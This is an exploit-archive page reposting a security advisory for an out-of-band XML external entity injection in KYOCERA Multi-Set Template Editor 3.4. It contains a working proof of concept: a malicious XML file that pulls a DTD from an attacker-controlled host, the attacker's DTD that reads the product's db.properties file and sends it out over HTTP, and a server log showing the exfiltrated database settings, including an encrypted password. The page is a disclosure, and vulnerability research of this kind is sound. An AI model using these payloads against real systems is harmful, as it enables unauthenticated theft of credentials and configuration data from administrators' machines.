exploit the possibilities

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection
Posted Apr 9, 2018
Authored by LiquidWorm | Site zeroscience.mk

KYOCERA Multi-Set Template Editor version 3.4.0906 suffers from an out-of-band XML external entity injection vulnerability.

tags | exploit, xxe
MD5 | 0c8850a036da5916bbb8e718eccc4d21

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection

Change Mirror Download

KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection


Vendor: KYOCERA Corporation
Product https://global.kyocera.com
Affected version: 3.4.0906

Summary: KYOCERA Net Admin is Kyocera's unified
device management software that uses a web-based
platform to give network administrators easy and
uncomplicated control to handle a fleet for up to
10,000 devices. Tasks that used to require multiple
programs or walking to each printer can now be
accomplished in a single, fast and modern environment.

Desc: KYOCERA Multi-Set Template Editor (part of Net
Admin) suffers from an unauthenticated XML External Entity
(XXE) injection vulnerability using the DTD parameter
entities technique resulting in disclosure and retrieval
of arbitrary data from the affected node via out-of-band
(OOB) channel attack. The vulnerability is triggered when
input passed to the Multi-Set Template Editor (kmmted.exe)
called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
is not sanitized while parsing a 5.x Multi-Set template XML
file.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache Tomcat/8.5.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5459
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php


28.03.2018

---


Malicious.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL [
<!ENTITY % remote SYSTEM "http://192.168.1.71:7777/xxe.xml">
%remote;
%root;
%oob;]>


Attacker's xxe.xml:

<!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> ">


Data retrieval:

lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
Serving HTTP on 0.0.0.0 port 7777 ...
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 -
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 -

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close